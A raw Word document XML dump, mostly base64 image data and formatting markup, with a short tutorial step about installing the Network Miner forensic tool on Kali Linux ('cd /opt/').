AO9/4Wf4a/wCgnJ/4CXH/AMbo/wCFo+G/+f8A&#10;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&#10;uDOXXrUGZEj4VfEWD3OZcTCQJIsYdJ7p//T5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D3+DRwYEAADvCwAADgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAKAAAAAAAAACEAb8TE7pzPAQCczwEAFAAAAAAAAAAAAAAAAABvBgAAZHJzL21lZGlh&#10;L2ltYWdlMS5qcGdQSwECLQAUAAYACAAAACEAWEcUn90AAAAFAQAADwAAAAAAAAAAAAAAAAA91gEA&#10;ZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAA&#10;R9cBAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAONgBAAAA&#10;">
                <v:rect id="Rectangle 2979" o:spid="_x0000_s1212" style="position:absolute;left:59448;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4F74BE97" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2980" o:spid="_x0000_s1213" style="position:absolute;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126343D4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3004" o:spid="_x0000_s1214"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EPxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gq9FN1tbUSiq0hRsaWHqrl4e2Rfk2D2bciuJv57t1DocZiZb5j5sre1uFLrK8caXkYK&#10;BHHuTMWFhuy4GU5B+IBssHZMGm7kYbkYPMwxNa7jPV0PoRARwj5FDWUITSqlz0uy6EeuIY7ej2st&#10;hijbQpoWuwi3tXxVaiItVhwXSmzovaT8fLhYDckpqT++Jq75fr7k6+0qW392Sab102O/moEI1If/&#10;8F97ZzSMlXqD3zfxCcjFHQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABk8YQ/HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId68" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3005" o:spid="_x0000_s1215"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CPxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvddekLRJdRawtPaYqiLdH9pkEs29Ddpuk/75bKPQ4zMw3zHo72kb01PnasYbFXIEg&#10;LpypudRwPr09LkH4gGywcUwavsnDdjN5WGNm3MCf1B9DKSKEfYYaqhDaTEpfVGTRz11LHL2b6yyG&#10;KLtSmg6HCLeNTJR6kRZrjgsVtrSvqLgfv6yGw5BcwjV/vy8XN2fap/KV0/yk9Ww67lYgAo3hP/zX&#10;/jAaUqWe4fdNfAJy8wMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCmYcCPxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="153824A8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="241" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now I am going to use Network Miner , it doesn’t come preinstalled in Kali Linux so you need to install it Open network miner. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2FD5A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">using following commands: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E21A4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="8341" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD500A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79432DC1" wp14:editId="213F4F0F">
                <wp:extent cx="5986577" cy="3761411"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40343" name="Group 40343"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
